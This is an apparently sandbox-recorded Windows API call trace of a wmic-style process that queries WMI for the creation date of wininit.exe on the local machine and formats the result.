[0563.201] malloc (_Size=0x18) returned 0x1896c0
[0563.201] SysStringLen (param_1="") returned 0x0
[0563.201] SysStringLen (param_1="") returned 0x1b
[0563.201] memcpy (in: _Dst=0x2fa038, _Src=0x2f1ca8, _Size=0x2 | out: _Dst=0x2fa038) returned 0x2fa038
[0563.201] memcpy (in: _Dst=0x2fa038, _Src=0x2f9f98, _Size=0x38 | out: _Dst=0x2fa038) returned 0x2fa038
[0563.201] free (_Block=0x189580)
[0563.201] free (_Block=0x189680)
[0563.201] free (_Block=0x189660)
[0563.201] ??1CHString@@QEAA@XZ () returned 0x303e1201
[0563.201] WbemLocator:IUnknown:AddRef (This=0x29cc20) returned 0x3
[0563.201] free (_Block=0x187fa0)
[0563.201] lstrlenW (lpString="") returned 0
[0563.202] lstrlenW (lpString="Q9IATRKPRH") returned 10
[0563.202] CompareStringW (Locale=0x800, dwCmpFlags=0x20001, lpString1="Q9IATRKPRH", cchCount1=10, lpString2="", cchCount2=0) returned 3
[0563.202] lstrlenW (lpString="Q9IATRKPRH") returned 10
[0563.202] malloc (_Size=0x16) returned 0x189660
[0563.202] lstrlenW (lpString="Q9IATRKPRH") returned 10
[0563.202] GetCurrentThreadId () returned 0x440
[0563.202] GetCurrentProcess () returned 0xffffffffffffffff
[0563.202] OpenProcessToken (in: ProcessHandle=0xffffffffffffffff, DesiredAccess=0x28, TokenHandle=0xaf620 | out: TokenHandle=0xaf620*=0x294) returned 1
[0563.202] GetTokenInformation (in: TokenHandle=0x294, TokenInformationClass=0x3, TokenInformation=0x0, TokenInformationLength=0x0, ReturnLength=0xaf618 | out: TokenInformation=0x0, ReturnLength=0xaf618) returned 0
[0563.202] malloc (_Size=0x40) returned 0x18ce80
[0563.202] GetTokenInformation (in: TokenHandle=0x294, TokenInformationClass=0x3, TokenInformation=0x18ce80, TokenInformationLength=0x40, ReturnLength=0xaf618 | out: TokenInformation=0x18ce80, ReturnLength=0xaf618) returned 1
[0563.202] AdjustTokenPrivileges (in: TokenHandle=0x294, DisableAllPrivileges=0, NewState=0x18ce80*(PrivilegesCount=0x5, Privileges=((Luid.LowPart=0x13, Luid.HighPart=0, Attributes=0x2), (Luid.LowPart=0x0, Luid.HighPart=3, Attributes=0x19), (Luid.LowPart=0x2, Luid.HighPart=33, Attributes=0x0), (Luid.LowPart=0x22, Luid.HighPart=0, Attributes=0x2), (Luid.LowPart=0x64006e, Luid.HighPart=591270354, Attributes=0x2b29))), BufferLength=0x0, PreviousState=0x0, ReturnLength=0x0 | out: PreviousState=0x0, ReturnLength=0x0) returned 1
[0563.203] free (_Block=0x18ce80)
[0563.203] CloseHandle (hObject=0x294) returned 1
[0563.203] lstrlenW (lpString="GET") returned 3
[0563.203] lstrlenW (lpString="get") returned 3
[0563.203] CompareStringW (Locale=0x800, dwCmpFlags=0x20001, lpString1="get", cchCount1=3, lpString2="GET", cchCount2=3) returned 2
[0563.205] malloc (_Size=0x18) returned 0x189680
[0563.205] lstrlenA (lpString="") returned 0
[0563.205] malloc (_Size=0x2) returned 0x187fa0
[0563.205] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr="", cbMultiByte=-1, lpWideCharStr=0x187fa0, cchWideChar=1 | out: lpWideCharStr="") returned 1
[0563.205] free (_Block=0x187fa0)
[0563.205] malloc (_Size=0x18) returned 0x189580
[0563.205] lstrlenA (lpString="") returned 0
[0563.205] malloc (_Size=0x2) returned 0x187fa0
[0563.205] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr="", cbMultiByte=-1, lpWideCharStr=0x187fa0, cchWideChar=1 | out: lpWideCharStr="") returned 1
[0563.206] free (_Block=0x187fa0)
[0563.206] malloc (_Size=0x18) returned 0x189640
[0563.206] lstrlenA (lpString="") returned 0
[0563.206] malloc (_Size=0x2) returned 0x187fa0
[0563.206] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr="", cbMultiByte=-1, lpWideCharStr=0x187fa0, cchWideChar=1 | out: lpWideCharStr="") returned 1
[0563.206] free (_Block=0x187fa0)
[0563.206] malloc (_Size=0x18) returned 0x189760
[0563.206] lstrlenA (lpString="") returned 0
[0563.206] malloc (_Size=0x2) returned 0x187fa0
[0563.206] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr="", cbMultiByte=-1, lpWideCharStr=0x187fa0, cchWideChar=1 | out: lpWideCharStr="") returned 1
[0563.206] free (_Block=0x187fa0)
[0563.206] malloc (_Size=0x18) returned 0x1896e0
[0563.206] malloc (_Size=0x18) returned 0x189700
[0563.206] SysStringLen (param_1="") returned 0x0
[0563.206] SysStringLen (param_1="creationdate") returned 0xc
[0563.207] memcpy (in: _Dst=0x2fbd88, _Src=0x31edc8, _Size=0x2 | out: _Dst=0x2fbd88) returned 0x2fbd88
[0563.207] memcpy (in: _Dst=0x2fbd88, _Src=0x2f9f98, _Size=0x1a | out: _Dst=0x2fbd88) returned 0x2fbd88
[0563.207] free (_Block=0x189680)
[0563.207] free (_Block=0x1896e0)
[0563.207] lstrlenW (lpString="__CLASS") returned 7
[0563.207] lstrlenW (lpString="creationdate") returned 12
[0563.207] CompareStringW (Locale=0x800, dwCmpFlags=0x20001, lpString1="creationdate", cchCount1=12, lpString2="__CLASS", cchCount2=7) returned 3
[0563.207] lstrlenW (lpString="__DERIVATION") returned 12
[0563.207] lstrlenW (lpString="creationdate") returned 12
[0563.207] CompareStringW (Locale=0x800, dwCmpFlags=0x20001, lpString1="creationdate", cchCount1=12, lpString2="__DERIVATION", cchCount2=12) returned 3
[0563.207] lstrlenW (lpString="__DYNASTY") returned 9
[0563.207] lstrlenW (lpString="creationdate") returned 12
[0563.207] CompareStringW (Locale=0x800, dwCmpFlags=0x20001, lpString1="creationdate", cchCount1=12, lpString2="__DYNASTY", cchCount2=9) returned 3
[0563.207] lstrlenW (lpString="__GENUS") returned 7
[0563.207] lstrlenW (lpString="creationdate") returned 12
[0563.207] CompareStringW (Locale=0x800, dwCmpFlags=0x20001, lpString1="creationdate", cchCount1=12, lpString2="__GENUS", cchCount2=7) returned 3
[0563.207] lstrlenW (lpString="__NAMESPACE") returned 11
[0563.207] lstrlenW (lpString="creationdate") returned 12
[0563.208] CompareStringW (Locale=0x800, dwCmpFlags=0x20001, lpString1="creationdate", cchCount1=12, lpString2="__NAMESPACE", cchCount2=11) returned 3
[0563.208] lstrlenW (lpString="__PATH") returned 6
[0563.208] lstrlenW (lpString="creationdate") returned 12
[0563.208] CompareStringW (Locale=0x800, dwCmpFlags=0x20001, lpString1="creationdate", cchCount1=12, lpString2="__PATH", cchCount2=6) returned 3
[0563.208] lstrlenW (lpString="__PROPERTYCOUNT") returned 15
[0563.208] lstrlenW (lpString="creationdate") returned 12
[0563.208] CompareStringW (Locale=0x800, dwCmpFlags=0x20001, lpString1="creationdate", cchCount1=12, lpString2="__PROPERTYCOUNT", cchCount2=15) returned 3
[0563.208] lstrlenW (lpString="__RELPATH") returned 9
[0563.208] lstrlenW (lpString="creationdate") returned 12
[0563.208] CompareStringW (Locale=0x800, dwCmpFlags=0x20001, lpString1="creationdate", cchCount1=12, lpString2="__RELPATH", cchCount2=9) returned 3
[0563.208] lstrlenW (lpString="__SERVER") returned 8
[0563.208] lstrlenW (lpString="creationdate") returned 12
[0563.208] CompareStringW (Locale=0x800, dwCmpFlags=0x20001, lpString1="creationdate", cchCount1=12, lpString2="__SERVER", cchCount2=8) returned 3
[0563.208] lstrlenW (lpString="__SUPERCLASS") returned 12
[0563.208] lstrlenW (lpString="creationdate") returned 12
[0563.208] CompareStringW (Locale=0x800, dwCmpFlags=0x20001, lpString1="creationdate", cchCount1=12, lpString2="__SUPERCLASS", cchCount2=12) returned 3
[0563.209] lstrlenW (lpString="Select * from Win32_Process") returned 27
[0563.209] malloc (_Size=0x38) returned 0x1886c0
[0563.209] lstrlenW (lpString="Select * from Win32_Process") returned 27
[0563.209] wcstok (in: _String="Select * from Win32_Process", _Delimiter=" ", _Context=0xffffffffffffff80 | out: _String="Select", _Context=0xffffffffffffff80) returned="Select"
[0563.209] malloc (_Size=0x18) returned 0x1896e0
[0563.209] free (_Block=0x189580)
[0563.209] wcstok (in: _String=0x0, _Delimiter=" ", _Context=0x20010d006a0005 | out: _String=0x0, _Context=0x20010d006a0005) returned="*"
[0563.209] lstrlenW (lpString="FROM") returned 4
[0563.209] lstrlenW (lpString="*") returned 1
[0563.209] CompareStringW (Locale=0x800, dwCmpFlags=0x20001, lpString1="*", cchCount1=1, lpString2="FROM", cchCount2=4) returned 1
[0563.209] malloc (_Size=0x18) returned 0x189580
[0563.209] free (_Block=0x1896e0)
[0563.209] wcstok (in: _String=0x0, _Delimiter=" ", _Context=0x20010e006a0005 | out: _String=0x0, _Context=0x20010e006a0005) returned="from"
[0563.210] lstrlenW (lpString="FROM") returned 4
[0563.210] lstrlenW (lpString="from") returned 4
[0563.210] CompareStringW (Locale=0x800, dwCmpFlags=0x20001, lpString1="from", cchCount1=4, lpString2="FROM", cchCount2=4) returned 2
[0563.210] malloc (_Size=0x18) returned 0x1896e0
[0563.210] free (_Block=0x189580)
[0563.210] wcstok (in: _String=0x0, _Delimiter=" ", _Context=0x20010f006a0005 | out: _String=0x0, _Context=0x20010f006a0005) returned="Win32_Process"
[0563.210] malloc (_Size=0x18) returned 0x189580
[0563.210] free (_Block=0x1896e0)
[0563.211] free (_Block=0x1886c0)
[0563.211] malloc (_Size=0x18) returned 0x1896e0
[0563.211] lstrlenA (lpString=" FROM ") returned 6
[0563.211] malloc (_Size=0xe) returned 0x189680
[0563.211] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=" FROM ", cbMultiByte=-1, lpWideCharStr=0x189680, cchWideChar=7 | out: lpWideCharStr=" FROM ") returned 7
[0563.211] free (_Block=0x189680)
[0563.211] malloc (_Size=0x18) returned 0x189680
[0563.211] lstrlenA (lpString="SELECT ") returned 7
[0563.211] malloc (_Size=0x10) returned 0x189720
[0563.211] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr="SELECT ", cbMultiByte=-1, lpWideCharStr=0x189720, cchWideChar=8 | out: lpWideCharStr="SELECT ") returned 8
[0563.212] free (_Block=0x189720)
[0563.212] malloc (_Size=0x18) returned 0x189720
[0563.212] SysStringLen (param_1="SELECT ") returned 0x7
[0563.212] SysStringLen (param_1="creationdate") returned 0xc
[0563.212] memcpy (in: _Dst=0x2fbf08, _Src=0x2f9b58, _Size=0x10 | out: _Dst=0x2fbf08) returned 0x2fbf08
[0563.212] memcpy (in: _Dst=0x2fbf16, _Src=0x2fbd88, _Size=0x1a | out: _Dst=0x2fbf16) returned 0x2fbf16
[0563.212] malloc (_Size=0x18) returned 0x189740
[0563.212] SysStringLen (param_1="SELECT creationdate") returned 0x13
[0563.212] SysStringLen (param_1=" FROM ") returned 0x6
[0563.212] memcpy (in: _Dst=0x2fa3a8, _Src=0x2fbf08, _Size=0x28 | out: _Dst=0x2fa3a8) returned 0x2fa3a8
[0563.212] memcpy (in: _Dst=0x2fa3ce, _Src=0x31edc8, _Size=0xe | out: _Dst=0x2fa3ce) returned 0x2fa3ce
[0563.213] malloc (_Size=0x18) returned 0x189780
[0563.213] SysStringLen (param_1="SELECT creationdate FROM ") returned 0x19
[0563.213] SysStringLen (param_1="Win32_Process") returned 0xd
[0563.213] memcpy (in: _Dst=0x2d6ed8, _Src=0x2fa3a8, _Size=0x34 | out: _Dst=0x2d6ed8) returned 0x2d6ed8
[0563.213] memcpy (in: _Dst=0x2d6f0a, _Src=0x2f9f98, _Size=0x1c | out: _Dst=0x2d6f0a) returned 0x2d6f0a
[0563.213] free (_Block=0x189640)
[0563.213] free (_Block=0x189740)
[0563.213] free (_Block=0x189720)
[0563.213] free (_Block=0x189680)
[0563.239] free (_Block=0x1896e0)
[0563.239] malloc (_Size=0x18) returned 0x1896e0
[0563.239] malloc (_Size=0x18) returned 0x189680
[0563.239] lstrlenA (lpString=" WHERE ") returned 7
[0563.239] malloc (_Size=0x10) returned 0x189720
[0563.239] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=" WHERE ", cbMultiByte=-1, lpWideCharStr=0x189720, cchWideChar=8 | out: lpWideCharStr=" WHERE ") returned 8
[0563.239] free (_Block=0x189720)
[0563.239] malloc (_Size=0x18) returned 0x189720
[0563.239] SysStringLen (param_1=" WHERE ") returned 0x7
[0563.239] SysStringLen (param_1="name=\"wininit.exe\"") returned 0x12
[0563.239] memcpy (in: _Dst=0x2fa3f8, _Src=0x31ee88, _Size=0x10 | out: _Dst=0x2fa3f8) returned 0x2fa3f8
[0563.239] memcpy (in: _Dst=0x2fa406, _Src=0x2fa3a8, _Size=0x26 | out: _Dst=0x2fa406) returned 0x2fa406
[0563.240] malloc (_Size=0x18) returned 0x189740
[0563.240] SysStringLen (param_1="SELECT creationdate FROM Win32_Process") returned 0x26
[0563.240] SysStringLen (param_1=" WHERE name=\"wininit.exe\"") returned 0x19
[0563.240] memcpy (in: _Dst=0x348718, _Src=0x2d6ed8, _Size=0x4e | out: _Dst=0x348718) returned 0x348718
[0563.240] memcpy (in: _Dst=0x348764, _Src=0x2fa3f8, _Size=0x34 | out: _Dst=0x348764) returned 0x348764
[0563.240] free (_Block=0x189780)
[0563.240] free (_Block=0x189720)
[0563.240] free (_Block=0x189680)
[0563.240] free (_Block=0x1896e0)
[0563.241] ??0CHString@@QEAA@XZ () returned 0xab4d0
[0563.241] GetCurrentThreadId () returned 0x440
[0563.241] CoCreateInstance (in: rclsid=0xffa673d0*(Data1=0x8d1c559d, Data2=0x84f0, Data3=0x4bb3, Data4=([0]=0xa7, [1]=0xd5, [2]=0x56, [3]=0xa7, [4]=0x43, [5]=0x5a, [6]=0x9b, [7]=0xa6)), pUnkOuter=0x0, dwClsContext=0x1, riid=0xffa673e0*(Data1=0xbfbf883a, Data2=0xcad7, Data3=0x11d3, Data4=([0]=0xa1, [1]=0x1b, [2]=0x0, [3]=0x10, [4]=0x5a, [5]=0x1f, [6]=0x51, [7]=0x5a)), ppv=0xffad29c0 | out: ppv=0xffad29c0*=0x2fc920) returned 0x0
[0563.255] ??1CHString@@QEAA@XZ () returned 0x7fef5b8c96c
[0563.255] ??0CHString@@QEAA@XZ () returned 0xab4d0
[0563.255] GetCurrentThreadId () returned 0x440
[0563.255] malloc (_Size=0x18) returned 0x1896e0
[0563.255] malloc (_Size=0x18) returned 0x189680
[0563.255] malloc (_Size=0x18) returned 0x189720
[0563.255] malloc (_Size=0x18) returned 0x189780
[0563.255] malloc (_Size=0x18) returned 0x189640
[0563.255] SysStringLen (param_1="\\\\") returned 0x2
[0563.256] SysStringLen (param_1="Q9IATRKPRH") returned 0xa
[0563.256] memcpy (in: _Dst=0x2fa3f8, _Src=0x31edc8, _Size=0x6 | out: _Dst=0x2fa3f8) returned 0x2fa3f8
[0563.256] memcpy (in: _Dst=0x2fa3fc, _Src=0x2f9b58, _Size=0x16 | out: _Dst=0x2fa3fc) returned 0x2fa3fc
[0563.256] malloc (_Size=0x18) returned 0x1897a0
[0563.256] SysStringLen (param_1="\\\\Q9IATRKPRH") returned 0xc
[0563.256] SysStringLen (param_1="\\") returned 0x1
[0563.256] memcpy (in: _Dst=0x2fbf08, _Src=0x2fa3f8, _Size=0x1a | out: _Dst=0x2fbf08) returned 0x2fbf08
[0563.256] memcpy (in: _Dst=0x2fbf20, _Src=0x2f1ca8, _Size=0x4 | out: _Dst=0x2fbf20) returned 0x2fbf20
[0563.256] malloc (_Size=0x18) returned 0x18ceb0
[0563.256] SysStringLen (param_1="\\\\Q9IATRKPRH\\") returned 0xd
[0563.256] SysStringLen (param_1="ROOT\\CIMV2") returned 0xa
[0563.257] memcpy (in: _Dst=0x2fa3a8, _Src=0x2fbf08, _Size=0x1c | out: _Dst=0x2fa3a8) returned 0x2fa3a8
[0563.257] memcpy (in: _Dst=0x2fa3c2, _Src=0x31ee88, _Size=0x16 | out: _Dst=0x2fa3c2) returned 0x2fa3c2
[0563.257] free (_Block=0x1897a0)
[0563.257] free (_Block=0x189640)
[0563.257] free (_Block=0x189780)
[0563.257] free (_Block=0x189720)
[0563.257] free (_Block=0x189680)
[0563.257] free (_Block=0x1896e0)
[0563.257] malloc (_Size=0x18) returned 0x1896e0
[0563.258] malloc (_Size=0x18) returned 0x189680
[0563.258] malloc (_Size=0x18) returned 0x189720
[0563.258] WbemLocator:IWbemLocator:ConnectServer (in: This=0x29cc20, strNetworkResource="\\\\Q9IATRKPRH\\ROOT\\CIMV2", strUser=0x0, strPassword=0x0, strLocale="ms_409", lSecurityFlags=0, strAuthority=0x0, pCtx=0x0, ppNamespace=0xffad29d0 | out: ppNamespace=0xffad29d0*=0x308a30) returned 0x0
[0563.282] free (_Block=0x189720)
[0563.282] free (_Block=0x189680)
[0563.282] free (_Block=0x1896e0)
[0563.282] CoSetProxyBlanket (pProxy=0x308a30, dwAuthnSvc=0xffffffff, dwAuthzSvc=0x0, pServerPrincName=0x0, dwAuthnLevel=0x6, dwImpLevel=0x3, pAuthInfo=0x0, dwCapabilities=0x0) returned 0x0
[0563.283] free (_Block=0x18ceb0)
[0563.283] ??1CHString@@QEAA@XZ () returned 0x7fef5b8c96c
[0563.283] ??0CHString@@QEAA@XZ () returned 0xab3e0
[0563.283] GetCurrentThreadId () returned 0x440
[0563.283] free (_Block=0x189760)
[0563.283] malloc (_Size=0x18) returned 0x189760
[0563.283] ??0CHString@@QEAA@XZ () returned 0xab390
[0563.283] GetCurrentThreadId () returned 0x440
[0563.284] CoCreateInstanceEx (in: Clsid=0xffa673b0*(Data1=0x674b6698, Data2=0xee92, Data3=0x11d0, Data4=([0]=0xad, [1]=0x71, [2]=0x0, [3]=0xc0, [4]=0x4f, [5]=0xd8, [6]=0xfd, [7]=0xff)), punkOuter=0x0, dwClsCtx=0x1, pServerInfo=0x0, dwCount=0x1, pResults=0xab340 | out: pResults=((pIID=0xffa67380*(Data1=0x44aca674, Data2=0xe8fc, Data3=0x11d0, Data4=([0]=0xa0, [1]=0x7c, [2]=0x0, [3]=0xc0, [4]=0x4f, [5]=0xb6, [6]=0x88, [7]=0x20)), pItf=0x2fcea0, hr=0x0))) returned 0x0
[0563.292] ??1CHString@@QEAA@XZ () returned 0x7fef5b8c96c
[0563.292] malloc (_Size=0x18) returned 0x1896e0
[0563.292] IWbemServices:ExecQuery (in: This=0x308a30, strQueryLanguage="WQL", strQuery="SELECT creationdate FROM Win32_Process WHERE name=\"wininit.exe\"", lFlags=48, pCtx=0x0, ppEnum=0xab3f0 | out: ppEnum=0xab3f0*=0x369870) returned 0x0
[0563.540] free (_Block=0x1896e0)
[0563.540] malloc (_Size=0x18) returned 0x1896e0
[0564.898] WbemContext:IWbemContext:SetValue (This=0x2fcea0, wszName="ExcludeSystemProperties", lFlags=0, pValue=0xab450*(varType=0xb, wReserved1=0x0, wReserved2=0x0, wReserved3=0x0, varVal1=0xffff, varVal2=0x0)) returned 0x0
[0564.898] free (_Block=0x1896e0)
[0564.898] CoSetProxyBlanket (pProxy=0x369870, dwAuthnSvc=0xffffffff, dwAuthzSvc=0x0, pServerPrincName=0x0, dwAuthnLevel=0x6, dwImpLevel=0x3, pAuthInfo=0x0, dwCapabilities=0x0) returned 0x0
[0564.909] IEnumWbemClassObject:Next (in: This=0x369870, lTimeout=-1, uCount=0x1, apObjects=0xab3f8, puReturned=0xab410 | out: apObjects=0xab3f8*=0x2c11630, puReturned=0xab410*=0x1) returned 0x0
[0564.912] WbemObjectTextSrc:IWbemObjectTextSrc:GetText (in: This=0x2fc920, lFlags=0, pObj=0x2c11630, uObjTextFormat=0x1, pCtx=0x2fcea0, strText=0xab400 | out: strText=0xab400*="20240603113412.436800+120") returned 0x0
[0565.760] malloc (_Size=0x18) returned 0x1896e0
[0565.760] malloc (_Size=0x18) returned 0x189680
[0565.760] SysStringLen (param_1="") returned 0x5
[0565.760] SysStringLen (param_1="20240603113412.436800+120") returned 0x90
[0565.760] memcpy (in: _Dst=0x36c6a8, _Src=0x31edc8, _Size=0xc | out: _Dst=0x36c6a8) returned 0x36c6a8
[0565.760] memcpy (in: _Dst=0x36c6b2, _Src=0x36ba78, _Size=0x122 | out: _Dst=0x36c6b2) returned 0x36c6b2
[0565.760] free (_Block=0x189760)
[0565.761] free (_Block=0x1896e0)
[0565.761] IUnknown:Release (This=0x2c11630) returned 0x0
[0565.761] IEnumWbemClassObject:Next (in: This=0x369870, lTimeout=-1, uCount=0x1, apObjects=0xab3f8, puReturned=0xab410 | out: apObjects=0xab3f8*=0x0, puReturned=0xab410*=0x0) returned 0x1
[0565.763] malloc (_Size=0x18) returned 0x1896e0
[0565.763] malloc (_Size=0x18) returned 0x189760
[0565.763] SysStringLen (param_1="20240603113412.436800+120") returned 0x95
[0565.763] SysStringLen (param_1="") returned 0x6
[0565.763] memcpy (in: _Dst=0x36c7f8, _Src=0x36c6a8, _Size=0x12c | out: _Dst=0x36c7f8) returned 0x36c7f8
[0565.763] memcpy (in: _Dst=0x36c922, _Src=0x36c0e8, _Size=0xe | out: _Dst=0x36c922) returned 0x36c922
[0565.764] free (_Block=0x189680)
[0565.764] free (_Block=0x1896e0)
[0565.764] free (_Block=0x189760)
[0565.764] malloc (_Size=0x18) returned 0x189760
[0565.764] IUnknown:Release (This=0x369870) returned 0x0
[0565.767] ??1CHString@@QEAA@XZ () returned 0x7fef5b8c96c
[0565.767] free (_Block=0x189760)
[0565.767] free (_Block=0x189740)
[0565.767] free (_Block=0x189580)
[0565.767] free (_Block=0x189700)
[0565.768] malloc (_Size=0x18) returned 0x189700
[0565.768] malloc (_Size=0x18) returned 0x189580
[0565.768] SysStringLen (param_1="") returned 0x1b
[0565.768] SysStringLen (param_1="20240603113412.436800+120") returned 0x9b
[0565.768] memcpy (in: _Dst=0x36bcf8, _Src=0x2fa038, _Size=0x38 | out: _Dst=0x36bcf8) returned 0x36bcf8
[0565.768] memcpy (in: _Dst=0x36bd2e, _Src=0x36c7f8, _Size=0x138 | out: _Dst=0x36bd2e) returned 0x36bd2e
[0565.768] free (_Block=0x1896c0)
[0565.768] free (_Block=0x189700)
[0565.768] malloc (_Size=0x18) returned 0x189700
[0565.769] malloc (_Size=0x18) returned 0x1896c0
[0565.769] SysStringLen (param_1="20240603113412.436800+120") returned 0xb6
[0565.769] SysStringLen (param_1="") returned 0xa
[0565.769] memcpy (in: _Dst=0x36a108, _Src=0x36bcf8, _Size=0x16e | out: _Dst=0x36a108) returned 0x36a108
[0565.769] memcpy (in: _Dst=0x36a274, _Src=0x36c0e8, _Size=0x16 | out: _Dst=0x36a274) returned 0x36a274
[0565.769] free (_Block=0x189580)
[0565.769] free (_Block=0x189700)
[0565.769] ??0CHString@@QEAA@XZ () returned 0xaf680
[0565.769] malloc (_Size=0x18) returned 0x189700
[0565.769] malloc (_Size=0x20) returned 0x18ceb0
[0565.770] memcpy_s (in: _Destination=0x18ceb0, _DestinationSize=0x1e, _Source=0x36c0e8, _SourceSize=0x14 | out: _Destination=0x18ceb0) returned 0x0
[0565.770] lstrlenW (lpString="&") returned 1
[0565.770] lstrlenW (lpString="&") returned 5
[0565.770] lstrlenW (lpString="<") returned 1
[0565.770] lstrlenW (lpString="<") returned 4
[0565.770] lstrlenW (lpString=">") returned 1
[0565.770] lstrlenW (lpString=">") returned 4
[0565.770] lstrlenW (lpString="'") returned 1
[0565.770] lstrlenW (lpString="'") returned 6
[0565.770] lstrlenW (lpString="\"") returned 1
[0565.770] lstrlenW (lpString=""") returned 6
[0565.770] malloc (_Size=0x18) returned 0x189580
[0565.770] free (_Block=0x189700)
[0565.771] free (_Block=0x18ceb0)
[0565.771] ?Format@CHString@@QEAAXPEBGZZ () returned 0x18d68c
[0565.771] malloc (_Size=0x18) returned 0x189700
[0565.772] free (_Block=0x1895a0)
[0565.772] free (_Block=0x189580)
[0565.772] ??1CHString@@QEAA@XZ () returned 0x303e1201
[0565.772] ??0CHString@@QEAA@XZ () returned 0xaf678
[0565.772] malloc (_Size=0x18) returned 0x189580
[0565.772] malloc (_Size=0x18) returned 0x1895a0
[0565.772] malloc (_Size=0x70) returned 0x18d680
[0565.772] memcpy_s (in: _Destination=0x18d680, _DestinationSize=0x6e, _Source=0x313818, _SourceSize=0x68 | out: _Destination=0x18d680) returned 0x0
[0565.772] lstrlenW (lpString="&") returned 1
[0565.772] lstrlenW (lpString="&") returned 5
[0565.772] lstrlenW (lpString="<") returned 1
[0565.772] lstrlenW (lpString="<") returned 4
[0565.772] lstrlenW (lpString=">") returned 1
[0565.772] lstrlenW (lpString=">") returned 4
[0565.772] lstrlenW (lpString="'") returned 1
[0565.773] lstrlenW (lpString="'") returned 6
[0565.773] lstrlenW (lpString="\"") returned 1
[0565.773] lstrlenW (lpString=""") returned 6
[0565.773] malloc (_Size=0xa6) returned 0x18d700
[0565.773] memcpy_s (in: _Destination=0x18d700, _DestinationSize=0xa6, _Source=0x18d680, _SourceSize=0x68 | out: _Destination=0x18d700) returned 0x0
[0565.773] free (_Block=0x18d680)
[0565.773] memmove_s (in: _Destination=0x18d736, _DestinationSize=0x6e, _Source=0x18d72c, _SourceSize=0x3c | out: _Destination=0x18d736) returned 0x0
[0565.773] memcpy_s (in: _Destination=0x18d72a, _DestinationSize=0x7a, _Source=0xffa66098, _SourceSize=0xc | out: _Destination=0x18d72a) returned 0x0
[0565.773] memmove_s (in: _Destination=0x18d758, _DestinationSize=0x4c, _Source=0x18d74e, _SourceSize=0x24 | out: _Destination=0x18d758) returned 0x0
[0565.773] memcpy_s (in: _Destination=0x18d74c, _DestinationSize=0x58, _Source=0xffa66098, _SourceSize=0xc | out: _Destination=0x18d74c) returned 0x0
[0565.773] malloc (_Size=0x18) returned 0x189740
[0565.774] free (_Block=0x1895a0)
[0565.774] free (_Block=0x18d700)
[0565.774] ?Format@CHString@@QEAAXPEBGZZ () returned 0x18d68c
[0565.774] malloc (_Size=0x18) returned 0x1895a0
[0565.774] malloc (_Size=0x18) returned 0x189760
[0565.774] SysStringLen (param_1="") returned 0x9
[0565.774] SysStringLen (param_1=" PROCESS where name="wininit.exe" get creationdate ") returned 0x59
[0565.774] memcpy (in: _Dst=0x36a2a8, _Src=0x36c0e8, _Size=0x14 | out: _Dst=0x36a2a8) returned 0x36a2a8
[0565.774] memcpy (in: _Dst=0x36a2ba, _Src=0x2eef38, _Size=0xb4 | out: _Dst=0x36a2ba) returned 0x36a2ba
[0565.775] free (_Block=0x189580)
[0565.775] free (_Block=0x1895a0)
[0565.775] ??0CHString@@QEAA@XZ () returned 0xaf668
[0565.775] malloc (_Size=0x18) returned 0x1895a0
[0565.775] ??0CHString@@QEAA@XZ () returned 0xaf5f8
[0565.775] malloc (_Size=0x18) returned 0x189580
[0565.775] malloc (_Size=0x8) returned 0x187fa0
[0565.775] memmove_s (in: _Destination=0x187fa0, _DestinationSize=0x8, _Source=0x186690, _SourceSize=0x8 | out: _Destination=0x187fa0) returned 0x0
[0565.775] malloc (_Size=0x18) returned 0x1896e0
[0565.776] malloc (_Size=0x20) returned 0x18ceb0
[0565.776] memcpy_s (in: _Destination=0x18ceb0, _DestinationSize=0x1e, _Source=0x31ee28, _SourceSize=0x14 | out: _Destination=0x18ceb0) returned 0x0
[0565.776] lstrlenW (lpString="&") returned 1
[0565.776] lstrlenW (lpString="&") returned 5
[0565.776] lstrlenW (lpString="<") returned 1
[0565.776] lstrlenW (lpString="<") returned 4
[0565.776] lstrlenW (lpString=">") returned 1
[0565.776] lstrlenW (lpString=">") returned 4
[0565.776] lstrlenW (lpString="'") returned 1
[0565.776] lstrlenW (lpString="'") returned 6
[0565.776] lstrlenW (lpString="\"") returned 1
[0565.776] lstrlenW (lpString=""") returned 6
[0565.776] malloc (_Size=0x18) returned 0x189680
[0565.776] free (_Block=0x1896e0)
[0565.777] free (_Block=0x18ceb0)
[0565.777] ?Format@CHString@@QEAAXPEBGZZ () returned 0x18da4c
[0565.777] malloc (_Size=0x18) returned 0x1896e0
[0565.777] malloc (_Size=0x18) returned 0x189720
[0565.777] SysStringLen (param_1="") returned 0xa
[0565.777] SysStringLen (param_1="Q9IATRKPRH") returned 0x17
[0565.777] memcpy (in: _Dst=0x2d6ed8, _Src=0x36c0e8, _Size=0x16 | out: _Dst=0x2d6ed8) returned 0x2d6ed8
[0565.777] memcpy (in: _Dst=0x2d6eec, _Src=0x2fa038, _Size=0x30 | out: _Dst=0x2d6eec) returned 0x2d6eec
[0565.777] free (_Block=0x189580)
[0565.777] free (_Block=0x1896e0)
[0565.777] malloc (_Size=0x18) returned 0x1896e0
[0565.778] malloc (_Size=0x18) returned 0x189580
[0565.778] SysStringLen (param_1="Q9IATRKPRH") returned 0x21
[0565.778] SysStringLen (param_1="") returned 0xb
[0565.778] memcpy (in: _Dst=0x313818, _Src=0x2d6ed8, _Size=0x44 | out: _Dst=0x313818) returned 0x313818
[0565.778] memcpy (in: _Dst=0x31385a, _Src=0x31ee28, _Size=0x18 | out: _Dst=0x31385a) returned 0x31385a
[0565.778] free (_Block=0x189720)
[0565.778] free (_Block=0x1896e0)
[0565.778] free (_Block=0x189680)
[0565.778] free (_Block=0x187fa0)
[0565.778] ??1CHString@@QEAA@XZ () returned 0x303e1201
[0565.778] malloc (_Size=0x18) returned 0x189680
[0565.778] SysStringLen (param_1="") returned 0x17
[0565.778] SysStringLen (param_1="Q9IATRKPRH") returned 0x2c
[0565.779] memcpy (in: _Dst=0x2eef38, _Src=0x2fa628, _Size=0x30 | out: _Dst=0x2eef38) returned 0x2eef38
